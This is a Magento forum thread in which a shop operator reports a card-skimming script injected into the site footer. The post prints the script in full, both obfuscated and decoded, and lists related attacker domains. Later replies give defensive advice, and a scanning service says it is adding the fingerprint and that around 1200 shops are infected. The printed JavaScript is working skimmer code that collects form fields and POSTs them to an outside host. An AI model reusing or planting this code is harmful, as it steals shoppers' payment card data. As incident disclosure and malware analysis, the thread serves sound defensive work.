Looks similar to the GuruIncSite attack. Malicious JS injected into design/footer/absolute_footer. The JS sends CC data to a site by ajax.
We're fully patched and magereport found no known vulnerabilities, so thinking this might be a new attack vector.
The script was this
var _0xe0eb=["\x63\x68\x61\x6E\x67\x65","\x66\x6F\x72\x6D","\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x6F\x70\x73\x5F\x63\x63\x5B\x79\x65\x61\x72\x5D\x22\x5D","\x73\x65\x6C\x65\x63\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x70\x61\x79\x6D\x65\x6E\x74\x5B\x63\x63\x5F\x65\x78\x70\x5F\x79\x65\x61\x72\x5D\x22\x5D","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x22\x5D","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x22\x66\x75\x6C\x6C\x5F\x63\x63\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x22\x5D","\x73\x65\x6C\x65\x63\x74\x5B\x69\x64\x3D\x22\x72\x65\x64\x65\x63\x61\x72\x64\x5F\x65\x78\x70\x69\x72\x61\x74\x69\x6F\x6E\x5F\x79\x72\x22\x5D","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C","","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x6A\x69\x6B","\x2D","\x72\x65\x70\x6C\x61\x63\x65","\x3D","\x26","\x26\x69\x64\x64\x3D","\x68\x6F\x73\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x6A\x2D\x6D\x6F\x64\x2E\x6C\x69\x6E\x6B\x2F\x6D\x61\x67\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x6A\x73\x6F\x6E","\x61\x6A\x61\x78","\x6F\x6E"];setTimeout(function(){jQuery(function(_0x9760x1){_0x9760x1(document)[_0xe0eb[26]](_0xe0eb[0],_0xe0eb[1],function(){grelos_v= null;a= [_0xe0eb[2],_0xe0eb[3],_0xe0eb[4],_0xe0eb[5],_0xe0eb[6]];for(var _0x9760x2=0;_0x9760x2< 5;_0x9760x2++){try{if(_0x9760x1(a[_0x9760x2])[_0xe0eb[8]]()[_0xe0eb[7]]> 0){_0x9760x3()}}catch(e){}};function _0x9760x3(){var _0x9760x4=_0xe0eb[9];var _0x9760x5=document[_0xe0eb[11]](_0xe0eb[10]);for(var _0x9760x6=0;_0x9760x6< _0x9760x5[_0xe0eb[7]];_0x9760x6++){if(_0x9760x5[_0x9760x6][_0xe0eb[12]][_0xe0eb[7]]> 0){var _0x9760x7=_0x9760x5[_0x9760x6][_0xe0eb[13]];if(_0x9760x7== _0xe0eb[9]){_0x9760x7= _0xe0eb[14]+ _0x9760x6};var _0x9760x8=_0x9760x7[_0xe0eb[16]](/\[/g,_0xe0eb[15]);var _0x9760x9=_0x9760x8[_0xe0eb[16]](/-redecard/,_0xe0eb[9]);_0x9760x4+= _0x9760x9[_0xe0eb[16]](/]/g,_0xe0eb[9])+ _0xe0eb[17]+ _0x9760x5[_0x9760x6][_0xe0eb[12]]+ _0xe0eb[18]}};_0x9760x4= _0x9760x4+ _0xe0eb[19]+ window[_0xe0eb[21]][_0xe0eb[20]];_0x9760x1[_0xe0eb[25]]({url:_0xe0eb[22],data:_0x9760x4,type:_0xe0eb[23],dataType:_0xe0eb[24],success:function(_0x9760xa){return false},error:function(_0x9760xb,_0x9760xc,_0x9760xd){return false}})}})})},5000)
decoded looks like this
var func = ["change", "form", "select[name='ops_cc[year]']", "select[name='payment[cc_exp_year]']", "input[name='expiration ']", "input[name='full_cc_expiration ']", "select[id='redecard_expiration_yr ']", "length", "val", "", "input, select, textarea, checkbox", "querySelectorAll", "value", "name", "jik", "-", "replace", "=", "&", "&idd=", "host", "location", "https://sj-mod.link/mag.php", "POST", "json", "ajax", "on"]; setTimeout(function() { jQuery(function(func2) { func2(document)[func[26]](func[0], func[1], function() { grelos_v = null; a = [func[2], func[3], func[4], func[5], func[6]]; for (var var1 = 0; var1 < 5; var1++) { try { if (func2(a[var1])[func[8]]()[func[7]] > 0) { func3() } } catch (e) {} }; function func3() { var a = func[9]; var b = document[func[11]](func[10]); for (var c = 0; c < b[func[7]]; c++) { if (b[c][func[12]][func[7]] > 0) { var d = b[c][func[13]]; if (d == func[9]) { d = func[14] + c }; var e = d[func[16]](/\[/g, func[15]); var f = e[func[16]](/-redecard/, func[9]); a += f[func[16]](/]/g, func[9]) + func[17] + b[c][func[12]] + func[18] } }; a = a + func[19] + window[func[21]][func[20]]; func2[func[25]]({ url: func[22], data: a, type: func[23], dataType: func[24], success: function() { return false }, error: function() { return false } }) } }) }) }, 5000)
Not sure how they gained access yet but I'm finding very very little on this
related urls are
sj-mods.link
sj-mods.link/mag.php
sj-mods.link/mage.js
sj-mods.link/sj-mods/mage.js
urls similar to this on the same server are using js-save.link there are probably more.
In the code there is a grelos_v variable which also appears in this https://community.magento.com/t5/Security-Patches/Security-Issue-with-Magento-1-9-x-x-ccard-js/td-p/... our ccard.js is clean so it doesn't look like they got in using that.
Usually Magento is not the only attach vector. Sometimes computer has other packages installed, holes left unplugged. Sometimes Magento is just an innocent bystander which is now used to redistribute the payload.
Did you check magereport.com?
Also sometimes worm stay dormant after gaining access to the system and wake up weeks or months later. It could very well be that it's been in the system for a while.
I did check magereport and it found nothing to report.
I came across this from 21 days ago reporting something similar suggesting it was an SQL injection https://safeweb.norton.com/reviews/314807
This is a pretty bad hack as your losing card details, if it truly comes from SQL injection you should find the vulnerability asap as it will only happen again until its fixed.
You can grep through your logs for SQL injections quite easily but it can be CPU intensive if you have a large logs on a low powered server.
Even though you are using the latest version of the Magento there are many other possibilities which may compromise security.
Such as custom modules,a virus infected system used to access and deploy code, admin users which were created in past but not deactivated and not following Magento best practices.
Remove all suspicious files and ip restrict admin access for you magento site.
That's what we're currently doing, we're auditing everything, scanning our logs for brute force attempts and sql injection attempts.
We follow best practices and have our own, we regularly patch our servers and the software installed, servers are locked down as much as we can, php is only runnable in very specific directories etc We've still not found the point of entry so to speak, but once we do I'll keep this thread up to date. We're leaning towards the site admins having really awful passwords at this point.
You could look to installing a FIM (like http://www.tripwire.com/it-security-software/scm/file-integrity-monitoring/) as a short term protection until you have found the insecurity.
It may even help find the breach for you.
Thanks for reporting, we're adding this fingerprint to Magereport right now.
According to a quick check, some 500 other shops appear infected with this particular malware.
Correction: some 1200 shops, on top of the shops that are infected with already known malware.